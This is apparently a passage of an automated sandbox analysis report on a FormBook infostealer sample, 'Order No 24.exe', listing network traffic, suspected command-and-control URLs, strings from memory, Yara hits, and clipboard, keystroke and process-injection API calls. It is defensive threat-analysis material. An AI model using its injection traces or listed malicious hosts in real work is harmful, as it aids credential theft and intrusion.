20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /95c0/ was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Nov 2024 15:28:07 GMTServer: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 35 63 30 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /95c0/ was not found on this server.</p></body></html>
                Source: net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
                Source: net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
                Source: net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
                Source: net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
                Source: net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
                Source: net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
                Source: net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
                Source: net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
                Source: net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
                Source: net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
                Source: net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
                Source: net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
                Source: net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
                Source: net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
                Source: net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/js/min.js?v2.3
                Source: net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
                Source: net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/28903/search.png)
                Source: net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/28905/arrrow.png)
                Source: net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/29590/bg1.png)
                Source: net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
                Source: net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.Yushaliu.online
                Source: vqiDHNHvZuv.exe, 00000007.00000002.4580363583.00000000051EF000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.marketprediction.app
                Source: vqiDHNHvZuv.exe, 00000007.00000002.4580363583.00000000051EF000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.marketprediction.app/ucmb/
                Source: net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yushaliu.online/Dr._Sebi.cfm?fp=IUBJjpOxm5DmnP2V%2BIB8rikJD9RKEsfkZhhxpJLOvCXMdO%2BojgjGE
                Source: net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yushaliu.online/Maas.cfm?fp=IUBJjpOxm5DmnP2V%2BIB8rikJD9RKEsfkZhhxpJLOvCXMdO%2BojgjGEJMSh
                Source: net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yushaliu.online/USHA_Handball.cfm?fp=IUBJjpOxm5DmnP2V%2BIB8rikJD9RKEsfkZhhxpJLOvCXMdO%2Bo
                Source: net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yushaliu.online/United_States_Handball.cfm?fp=IUBJjpOxm5DmnP2V%2BIB8rikJD9RKEsfkZhhxpJLOv
                Source: net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yushaliu.online/Usha_Sewing_Machine.cfm?fp=IUBJjpOxm5DmnP2V%2BIB8rikJD9RKEsfkZhhxpJLOvCXM
                Source: net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yushaliu.online/__media__/design/underconstructionnotice.php?d=yushaliu.online
                Source: net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yushaliu.online/__media__/js/trademark.php?d=yushaliu.online&type=ns
                Source: net.exe, 00000004.00000003.2499290005.00000000079CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.consentmanager.net
                Source: net.exe, 00000004.00000003.2499290005.00000000079CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: net.exe, 00000004.00000003.2499290005.00000000079CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: net.exe, 00000004.00000003.2499290005.00000000079CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://delivery.consentmanager.net
                Source: vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
                Source: net.exe, 00000004.00000003.2499290005.00000000079CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: net.exe, 00000004.00000003.2499290005.00000000079CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: net.exe, 00000004.00000003.2499290005.00000000079CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: net.exe, 00000004.00000002.4576398296.0000000002995000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: net.exe, 00000004.00000002.4576398296.000000000296D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: net.exe, 00000004.00000003.2494315941.00000000079AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: net.exe, 00000004.00000002.4576398296.0000000002995000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: net.exe, 00000004.00000002.4576398296.0000000002995000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
                Source: net.exe, 00000004.00000002.4576398296.000000000296D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033T
                Source: net.exe, 00000004.00000002.4576398296.0000000002995000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://Y
                Source: net.exe, 00000004.00000002.4576398296.0000000002995000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: net.exe, 00000004.00000002.4576398296.000000000296D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: net.exe, 00000004.00000002.4578877580.0000000003A86000.00000004.10000000.00040000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.00000000032A6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://whois.gandi.net/en/results?search=4nk.education
                Source: net.exe, 00000004.00000002.4578877580.00000000043F2000.00000004.10000000.00040000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.0000000003C12000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://whois.gandi.net/en/results?search=astorg-group.info
                Source: net.exe, 00000004.00000003.2499290005.00000000079CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: net.exe, 00000004.00000002.4578877580.00000000043F2000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4578877580.0000000003A86000.00000004.10000000.00040000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.00000000032A6000.00000004.00000001.00040000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.0000000003C12000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.gandi.net/en/domain
                Source: net.exe, 00000004.00000002.4578877580.0000000003C18000.00000004.10000000.00040000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.0000000003438000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: net.exe, 00000004.00000003.2499290005.00000000079CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009D6B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_009D6B0C
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009D6D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_009D6D07
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009D6B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_009D6B0C
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009C2B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_009C2B37
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009EF7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_009EF7FF

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.490000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.490000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.4576339259.00000000028E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4575842016.0000000000390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2300832029.0000000000490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2301144839.0000000002D30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4577728076.0000000002B80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4580363583.0000000005160000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2301597898.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4577455340.00000000035C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Binary is likely a compiled AutoIt script file
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: This is a third-party compiled AutoIt script.0_2_00983D19
                Source: Order No 24.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: Order No 24.exe, 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_a1197d38-f
                Source: Order No 24.exe, 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_36fe4873-d
                Source: Order No 24.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_aaa58414-7
                Source: Order No 24.exeString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_518d1754-f
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: Order No 24.exe
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004BCA43 NtClose,2_2_004BCA43
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072B60 NtClose,LdrInitializeThunk,2_2_03072B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03072DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030735C0 NtCreateMutant,LdrInitializeThunk,2_2_030735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03074340 NtSetContextThread,2_2_03074340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03074650 NtSuspendThread,2_2_03074650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072B80 NtQueryInformationFile,2_2_03072B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072BA0 NtEnumerateValueKey,2_2_03072BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072BE0 NtQueryValueKey,2_2_03072BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072BF0 NtAllocateVirtualMemory,2_2_03072BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072AB0 NtWaitForSingleObject,2_2_03072AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072AD0 NtReadFile,2_2_03072AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072AF0 NtWriteFile,2_2_03072AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072F30 NtCreateSection,2_2_03072F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072F60 NtCreateProcessEx,2_2_03072F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072F90 NtProtectVirtualMemory,2_2_03072F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072FA0 NtQuerySection,2_2_03072FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072FB0 NtResumeThread,2_2_03072FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072FE0 NtCreateFile,2_2_03072FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072E30 NtWriteVirtualMemory,2_2_03072E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072E80 NtReadVirtualMemory,2_2_03072E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072EA0 NtAdjustPrivilegesToken,2_2_03072EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072EE0 NtQueueApcThread,2_2_03072EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072D00 NtSetInformationFile,2_2_03072D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072D10 NtMapViewOfSection,2_2_03072D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072D30 NtUnmapViewOfSection,2_2_03072D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072DB0 NtEnumerateKey,2_2_03072DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072DD0 NtDelayExecution,2_2_03072DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072C00 NtQueryInformationProcess,2_2_03072C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072C60 NtCreateKey,2_2_03072C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072C70 NtFreeVirtualMemory,2_2_03072C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072CA0 NtQueryInformationToken,2_2_03072CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072CC0 NtQueryVirtualMemory,2_2_03072CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072CF0 NtOpenProcess,2_2_03072CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073010 NtOpenDirectoryObject,2_2_03073010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073090 NtSetValueKey,2_2_03073090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030739B0 NtGetContextThread,2_2_030739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073D10 NtOpenProcessToken,2_2_03073D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073D70 NtOpenThread,2_2_03073D70
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F54340 NtSetContextThread,LdrInitializeThunk,4_2_02F54340
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F54650 NtSuspendThread,LdrInitializeThunk,4_2_02F54650
